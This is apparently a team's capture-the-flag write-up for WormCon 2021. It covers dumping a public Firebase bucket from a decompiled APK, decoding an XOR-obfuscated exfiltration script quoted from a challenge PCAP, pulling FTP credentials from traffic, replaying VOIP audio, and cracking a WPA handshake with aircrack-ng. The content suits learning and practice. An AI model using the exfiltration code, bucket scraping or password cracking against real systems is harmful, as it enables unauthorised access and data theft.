## 2021 - WormCon CTF

**Info**
- URL: https://capturetheflag.vulnfreak.org/
- Uname: HackITGuys
- Team name: HackITGuys


**Contest**
- Flag format: "wormcon{1337_Str1nG}"
- Discord: https://discord.com/invite/tnsB2Sw7QC


### Android - wormcon Gallery - 50pts

"*Our organisation made an application which shows the photos and wallpapers can you get something more from it :)*"

**Steps**
1. Opening the APK in 7zip, and looking at the content.  Waste of time, everything is encoded in DEX files.
1. Run the APK through an online decompiler. (javadecompilers.com)
1. Explore the decompiled application.  Found this interesting folder deep in the hierarchy with java files
    `'wormcon_gallery_source_from_JADX\wormcon_gallery_source_from_JADX\sources\org\wormcon\wormcongallery\'`
1. Open the files and explore.
    1. `'MainActivity$loadPhoto$1.java'` the long string looks interesting, but leads to nothing, nothing else of interest
    1. `'MainActivity$onCreate$1.java'` the long string looks interesting, but leads to nothing, nothing else of interest
    1. `'MainActivity.java'` the long string looks interesting, but the 'loadPhoto()' function is interesting as it builds the string which loads the images "xxx.jpg", where 'xxx' is the numebrs 1-10, in the gallery
1. `'loadPhoto()'` gets photos from an firebase blob based on the URL here `https://firebasestorage.googleapis.com/v0/b/wormcon.appspot.com/o/FILE_NAME_HERE?alt=media`
1. The blob is public, accessing it lists all its items. Writing a scripts which grabs all the files is given below.
1. After pulling the images, there are many non-image files which are of interest, the **"dumbarses"** files contains the flag

FLAG: `wormcon{PuBl1c_F1r3b4s3_4r3_D4nG3r0uSSSS!!!!!}`

In [ ]:
from requests import get
import  urllib

url = "https://firebasestorage.googleapis.com/v0/b/{}/o/{}?alt=media"

data = get("https://firebasestorage.googleapis.com/v0/b/wormcon.appspot.com/o/").json()
for item in data["items"]:
    turl = url.format(item["bucket"], urllib.parse.quote( item["name"], safe="") )
    image = get( turl ).content  #Byte content
    with open(item["name"], "wb") as fh: #Open a binary file
        fh.write(image)

## Networking - Network At Risk : Part 1 - 500pts

"*We are in danger again we got a incident report by our system and after that we capture the network traffic but I think this is not a normal and easy one we have to do deep analysis but due to shortage of time I am giving the task to you. Hope you will find something intresting.*"

**Steps**
1. Open the PCAP in wireshark and explore the content
1. Checking if there's any suspicious UDP traffic, only regular DNS calls
1. Checking for HTTP traffic, as there are few requests it can be manually analysed.
    1. Get capturetheflag.culnfreak.org, which is redirected to cloudflare
    1. OCSP requests
    1. Get index.html, which contains lorem ipsum site with images, css and javascripts
1. I exported all the images and files downloaded manually, 11 files in total
    1. 2 html files, 3 javascripts, 4 images and 3 CSS files
1. Replacing all urls in the HTML sites with the local links, then opening the first html site.
1. CORS error appear in the bottom to unknown URL via XHR request, which points to the JS files.
    '*https :// bot . vulnfreak . org / test . txt*'
1. Searching 'jquery.min.js' reveals the URL
1. Manually checking the URL and reproducing the code returns only error messages due to CORS on the URL
1. Checking the code, the URL parameter is encrypted with the following code block
```javascript
let CONTENT = '';
function enCrYpTX0r(text, key) {
    return Array.from(
        text,
        (c, i) => (c.charCodeAt() ^ key.charCodeAt(i % key.length))
    ).join('s');
}
function a4sSiIgGn_vVa4lLuUe(text) {
    CONTENT = text;
    return 1
}
function g3tTh3Wh4T(url) {
    var request = new XMLHttpRequest();
    request.open('GET', url, true);
    request.send(null);
    request.onreadystatechange = function() {
        if (request.readyState === 4 && request.status === 200) {
            var type = request.getResponseHeader('Content-Type');
            if (type.indexOf("text") !== 1) {
                console.log(request.responseText);
                a4sSiIgGn_vVa4lLuUe(request.responseText);
                fetch('http://127.0.0.1:1337?' + enCrYpTX0r(CONTENT, k3Y));
            }
        }
    }
}
g3tTh3Wh4T('https://bot.vulnfreak.org/test.txt');
```
1. Which encrypts a text with a key
1. The encrypted text is sent in the last request, `7s3s65s12s16s92s0s75s28s33s7s67s43s89s66s12s30s92s71s62s0s7s8s3s43s61s71s91s64s73s16s114s81s17`
    1. This is a text XOR encrypted with a key, then each UTF-16 integer value is joined with "s" as a separator
1. Looking further in the JS file, we find the key in two parts
    - `xgrts = "pl3as3n0t"`
    - `cftg="Us3th1S"`
    - Combined making the variable `k3Y = "pl3as3n0tUs3th1S"`
1. Breaking the cipher, is just running the cipher text through an XOR combined with the key as below, giving us the flag


FLAG: `wormcon{http_1s_n0t_s4f3_h4h4!!!!}`

In [ ]:
s = """7 3 65 12 16 92 0 75 28 33 7 67 43 89 66 12 30 92 71 62 0 7 8 3 43 61 71 91 64 73 16 114 81 17
112 108 51 97 115 51 110 48 116 85 115 51 116 104 49 83"""

data = []
for arr in s.split("\n"):
    d = []
    for item in arr.split():
        d.append(int(item))
    data.append(d)
cipher = data[0]
key = data[1]

ptext = []
for i in range(0, len(cipher)):
    ptext.append( chr(cipher[i]^key[i%len(key)]) )
print("".join(ptext))

### Networking - Network At Risk : Part 2 - 50pts
"*This is the another network traffic we capture for the another network we followed the same process you told us in previous one but that doesn't work in this case can you help us out in this also.*"

**Steps**
1. Check DNS/UDP, no dice
1. Check TCP, no dice bunch of TLS encrypted stuff
1. Check the HTTP, nothing
1. Check TCP again *!udp and !http*, I found FTP traffic with a username.
    1. Grab the password and username
        - USER: l3v1ath4n
        - PASS: pl3as3S4v3Th3w0rmC0n
    1. Follow the TCP stream with FTP traffic
    1. Look at the directory listings
    1. File of interest is the "B4ckF1r3.zip", follow the this FTP stream and export the FTP-data packet
1. Open the Zip file, it is encrypted.  Try the FTP password, for fun, and it actually worked
1. Read the  `'B4ckF1r3.sh'` file, which contains the flag
`echo 'wormcon{Y0u_4r3_St1LL_US1nG_F7P}'`

FLAG: `wormcon{Y0u_4r3_St1LL_US1nG_F7P}`

### Networking - Network At Risk : Part 3 - 94pts

"*We work for secret govt agencies and we got a report that there will attack on the state by terrorist group and our spy send us some files in three parts which he captured from their network can you tell what is happening on the network.*"

- `Note: put _ between the words and put them in the flag foramt`

**Steps**
1. Check DNS/UDP, no dice
1. Check TCP, no dice bunch of TLS encrypted stuff
1. See further on everything, seeing a bunch of SIP contact lists, calls and RTP traffic.
1. Looking up on google what RTP traffic is, it is "Real-time Transport Protocol".  Which is used for streaming and VOIP apparently.
1. Checking with Wireshark if RTP can be exported, it can via "Telephony->RTP->Stream Analysis->Play Streams"
    - https://osqa-ask.wireshark.org/questions/28553/hearing-audio-rtp-using-wireshark-capture/
1. A message is repeated which is the flag.

FLAG: `wormcon{Welcome_to_the_world_of_VOIP}`

### Network At Risk : Part 4 - 364pts
 
'*Help me to get into this network!! Download Flag Format: wormcon{password_bssid}*'
- `Note: bssid is in lowecase`

**Steps**
1. Explore the file, find the SSID and BSSID
    - Display filter: `wlan.bssid`
    - BSSID: 82:25:fa:ee:ed:91
    - SSID: DeathStar
2. Crack the password, since this is using a deaauth attack to get the handshake and the password hash
3. Open Kali, and extract the `rockyou.txt` wordlist.
    - `gunzip /usr/share/wordlists/rockyou.txt.gz`
    - New file: `/usr/share/wordlists/rockyou.txt`
4. Use Aircrack-ng to crack the hash
    - `$ aircrack-ng -a2 -b 82:25:fa:ee:ed:91 -w /usr/share/wordlists/rockyou.txt Downloads/challenge.cap`
5. This flag was in the wordlist

FLAG: `wormcon{P@$$w0rd_82:25:fa:ee:ed:91}`